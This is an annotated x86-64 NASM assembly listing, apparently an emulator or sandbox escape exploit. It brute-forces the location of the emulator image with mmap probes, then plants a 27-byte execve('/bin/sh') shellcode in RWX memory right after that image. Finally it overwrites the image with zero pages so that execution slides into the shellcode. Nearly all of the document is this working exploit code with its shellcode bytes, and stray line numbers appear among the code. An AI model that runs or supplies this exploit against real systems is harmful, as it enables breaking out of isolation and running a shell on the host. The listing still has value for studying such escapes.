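  ; ---------------------------------------------------------------------------
  ; Main flow (flat listing: no sections, no entry symbol, no C ABI).
  ; Syntax: NASM / Intel.  Target: x86-64 Linux syscall convention
  ;   (nr in rax; args rdi, rsi, rdx, r10, r8, r9; rcx/r11 clobbered;
  ;    rax in [-4095,-1] is -errno).
  ; Numbers used below: mmap=9, munmap=11, write=1,
  ;   PROT_READ|PROT_WRITE|PROT_EXEC = 7,
  ;   0x4032   = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS|MAP_NORESERVE.
  ; Register held across the whole flow:
  ;   r14 = current probe address (start of a 0xf0000000-byte window).
  ; NOTE(review): the comments below talk about "the emulator image"; this
  ; presumably runs as a guest whose mmap() is forwarded to the host with the
  ; address and MAP_FIXED intact -- confirm against the target.
  ; ---------------------------------------------------------------------------

  ; Start probing where PIE images are normally loaded.
          mov     r14, 0x550000000000

  ; Walk upward in 0xf0000000-byte windows.  Check() tries to map the window
  ; at r14 with MAP_FIXED_NOREPLACE: it succeeds while the window is free and
  ; reports failure (EEXIST) once it overlaps something already mapped, taken
  ; here to be the emulator image.  Every successfully probed window is
  ; released again so the address space is left as it was found.
  brute:
          mov     rsi, 0xf0000000
          call    Check
          test    eax, eax
          jz      done_brute                  ; rax == 0: window at r14 collides
          push    r14                         ; Check advanced r14 past the window
          mov     rsi, 0xf0000000
          sub     r14, rsi                    ; back to the window just mapped ...
          call    Free                        ; ... munmap(r14, 0xf0000000)
          pop     r14
          jmp     brute

  done_brute:
          call    Done

  ; Map two RWX pages right after the colliding window (r14 + 0xf0000000) to
  ; hold the payload.  MAP_FIXED here *will* replace whatever is there.
  ; 0xf0000000 goes through rax on purpose: as an immediate it would be
  ; sign-extended to -0x10000000.
          mov     rsi, 0x2000
          mov     rdi, r14
          mov     rax, 0xf0000000
          add     rdi, rax
          xor     r9d, r9d                    ; offset 0
          mov     r8d, -1                     ; fd -1 (anonymous)
          mov     r10d, 0x4032                ; MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS|MAP_NORESERVE
          mov     rdx, 7                      ; PROT_READ|PROT_WRITE|PROT_EXEC
          mov     eax, 9                      ; SYS_mmap
          syscall
          cmp     rax, -4095
          jae     map_fail                    ; -errno: never write through an unmapped address

  ; Copy the 27 payload bytes to the start of that mapping.  The count is
  ; explicit: the old `cmp rax, 27 / jge` loop copied 28 bytes and read one
  ; byte past the end of `payload`.
          mov     rsi, payload
          mov     rdi, r14
          mov     rax, 0xf0000000
          add     rdi, rax
          mov     rcx, 27                     ; bytes still to copy

  gogo_pow:
          mov     dl, [rsi]
          mov     [rdi], dl
          inc     rsi
          inc     rdi
          dec     rcx
          jnz     gogo_pow

  done_pow:

  ; Remap the colliding window itself with MAP_FIXED.  That discards the
  ; pages that were there (the emulator image, per the probe above) and
  ; leaves 0xf0000000 bytes of zeros.  Zero bytes decode as
  ; `add byte [rax], al`; the original author observed rax pointing inside
  ; the window, so whatever is still executing there slides through the
  ; zeros as a de-facto NOP sled and runs straight into the payload placed
  ; right after the window.  Nothing useful can be checked after this call:
  ; if the guest itself lives in the window, nothing below ever runs.
          mov     rsi, 0xf0000000
          mov     rdi, r14
          xor     r9d, r9d
          mov     r8d, -1
          mov     r10d, 0x4032
          mov     rdx, 7
          mov     eax, 9
          syscall

  oho:
          jmp     oho

  ; Reached only when the payload mapping could not be created: report it and
  ; park the guest instead of crashing on the copy loop.
  map_fail:
          call    NotGood
          jmp     oho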
  67.  
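  ; ---------------------------------------------------------------------------
  ; Check: probe whether the window [r14, r14 + rsi) is free.
  ; In:   r14 = address, rsi = length
  ; Out:  rax = 1 and r14 += rsi when the mapping was created (the window is
  ;       left mapped; the caller is expected to Free it),
  ;       rax = 0 and r14 unchanged when mmap reported an error.
  ;       Prints "mmap ok!" or "mmap failed!" accordingly.
  ; Clobbers: rax, rcx, rdx, rsi, rdi, r8-r11 (Alloc + syscall + Good/NotGood).
  ; Fix: the previous `test eax, eax / jnz fail` treated any non-zero low
  ; 32 bits as failure.  Under the Linux ABI a successful mmap returns the
  ; mapped address, so every window whose address has non-zero low bits was
  ; misreported as a collision.  An error is rax in [-4095, -1] (-errno,
  ; EEXIST for a MAP_FIXED_NOREPLACE collision); a syscall layer that returns
  ; 0 on success still passes this check.
  ; ---------------------------------------------------------------------------
  Check:
          call    Alloc
          cmp     rax, -4095
          jae     fail                        ; unsigned: catches -4095..-1
          add     r14, rsi                    ; rsi survives Alloc (only rcx/r11 clobbered)
          call    Good
          mov     rax, 1
          ret
  fail:
          call    NotGood
          mov     rax, 0
          ret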
  80.  
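  ; ---------------------------------------------------------------------------
  ; Corrupt: map one RWX page at rdi with MAP_FIXED and fill it with the
  ; qword 0x10000.  Not called anywhere in this listing.
  ; In:   rdi = page address (as chosen by the caller)
  ; Out:  rax = mmap result.  On -errno the page is left untouched; the old
  ;       version ran the fill loop regardless and would have written through
  ;       an address that was never mapped.
  ; Clobbers: rax, rcx, rdx, rdi, rsi, r8-r11.  rbx is no longer touched.
  ; ---------------------------------------------------------------------------
  Corrupt:
          mov     rsi, 0x1000                 ; one page
          xor     r9d, r9d                    ; offset 0
          mov     r8d, -1                     ; fd -1 (anonymous)
          mov     r10d, 0x4032                ; MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS|MAP_NORESERVE
          mov     rdx, 7                      ; PROT_READ|PROT_WRITE|PROT_EXEC
          mov     eax, 9                      ; SYS_mmap; rdi is passed through from the caller
          syscall
          cmp     rax, -4095
          jae     okok                        ; mapping failed: return -errno, write nothing

          mov     rdx, 0x10000                ; fill pattern
          mov     rcx, 0x1000 / 8             ; 512 qwords = one page
  over:
          mov     [rdi], rdx
          add     rdi, 8
          dec     rcx
          jnz     over
  okok:
          ret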
  102.  
  ; ---------------------------------------------------------------------------
  ; Alloc: mmap(r14, rsi, PROT_READ|PROT_WRITE|PROT_EXEC,
  ;             MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE|MAP_FIXED_NOREPLACE,
  ;             -1, 0)
  ; In:   r14 = requested address, rsi = length (set by the caller)
  ; Out:  rax = mapped address, or -errno (EEXIST when the range is already
  ;       in use -- the signal the probe loop relies on)
  ; Clobbers: rdi, rdx, r8, r9, r10, and rcx/r11 via `syscall`.
  ; NOTE(review): MAP_FIXED_NOREPLACE (0x100000) is only honoured by
  ; Linux >= 4.17; older kernels ignore the flag and hand back a different
  ; address instead of failing, so a collision would go unnoticed there.
  ; ---------------------------------------------------------------------------
  Alloc:
          mov     eax, 9                      ; SYS_mmap
          mov     rdi, r14                    ; addr
          mov     rdx, 7                      ; prot  = RWX
          mov     r10d, 0x104022              ; flags = PRIVATE|ANON|NORESERVE|FIXED_NOREPLACE
          mov     r8d, -1                     ; fd    = -1
          xor     r9d, r9d                    ; off   = 0
          syscall
          ret
  112.  
  ; ---------------------------------------------------------------------------
  ; Free: munmap(r14, rsi).  rsi (length) must be set by the caller.
  ; Out:  rax = 0 or -errno (callers in this listing do not check it).
  ; Clobbers: rdi, rcx, r11.
  ; ---------------------------------------------------------------------------
  Free:
          mov     eax, 11                     ; SYS_munmap
          mov     rdi, r14                    ; addr
          syscall
          ret
  118.  
  ; ---------------------------------------------------------------------------
  ; NotGood: write(1, msgError, 13) -- prints "mmap failed!\n" on stdout.
  ; Clobbers: rax, rdi, rsi, rdx, rcx, r11.  Return value is not checked.
  ; ---------------------------------------------------------------------------
  NotGood:
          mov     eax, 1                      ; SYS_write
          mov     edi, 1                      ; stdout
          mov     esi, msgError               ; 32-bit absolute address (flat, non-PIE listing)
          mov     edx, 13                     ; strlen("mmap failed!\n")
          syscall
          ret
  127.  
  ; ---------------------------------------------------------------------------
  ; Good: write(1, msgOk, 9) -- prints "mmap ok!\n" on stdout.
  ; (The old comment said "mmap failed!"; that is NotGood's message.)
  ; Clobbers: rax, rdi, rsi, rdx, rcx, r11.  Return value is not checked.
  ; ---------------------------------------------------------------------------
  Good:
          mov     eax, 1                      ; SYS_write
          mov     edi, 1                      ; stdout
          mov     esi, msgOk                  ; 32-bit absolute address (flat, non-PIE listing)
          mov     edx, 9                      ; strlen("mmap ok!\n")
          syscall
          ret
  136.  
  ; ---------------------------------------------------------------------------
  ; Done: write(1, msgDone, 5) -- prints "done\n" once the probe loop stops.
  ; Clobbers: rax, rdi, rsi, rdx, rcx, r11.  Return value is not checked.
  ; ---------------------------------------------------------------------------
  Done:
          mov     eax, 1                      ; SYS_write
          mov     edi, 1                      ; stdout
          mov     esi, msgDone                ; 32-bit absolute address (flat, non-PIE listing)
          mov     edx, 5                      ; strlen("done\n")
          syscall
          ret
  145.  
  ; Messages for Good / NotGood / Done.  Their lengths (9, 13, 5 bytes, newline
  ; included) are hard-coded at the write() call sites -- keep them in sync.
  msgOk:    db "mmap ok!", 10
  msgError: db "mmap failed!", 10
  msgDone:  db "done", 10

  ; payload: 27 bytes of x86-64 machine code that the main flow copies into
  ; the page following the zeroed window.  Decoded, it is the usual
  ; execve("/bin/sh", {"/bin/sh", NULL}, NULL) stub:
  ;   xor eax, eax
  ;   mov rbx, 0xff978cd091969dd1 ; neg rbx  -> rbx = "/bin/sh\0"
  ;   push rbx ; push rsp ; pop rdi           -> rdi = "/bin/sh"
  ;   cdq                                     -> rdx = NULL (envp)
  ;   push rdx ; push rdi ; push rsp ; pop rsi -> rsi = argv
  ;   mov al, 59 ; syscall                    -> execve
  payload:
          db 0x31, 0xc0                                                   ; xor eax, eax
          db 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff   ; mov rbx, imm64
          db 0x48, 0xf7, 0xdb                                             ; neg rbx
          db 0x53, 0x54, 0x5f                                             ; push rbx; push rsp; pop rdi
          db 0x99, 0x52, 0x57, 0x54, 0x5e                                 ; cdq; push rdx; push rdi; push rsp; pop rsi
          db 0xb0, 0x3b, 0x0f, 0x05                                       ; mov al, 0x3b; syscall
  payload_len equ $ - payload                                             ; = 27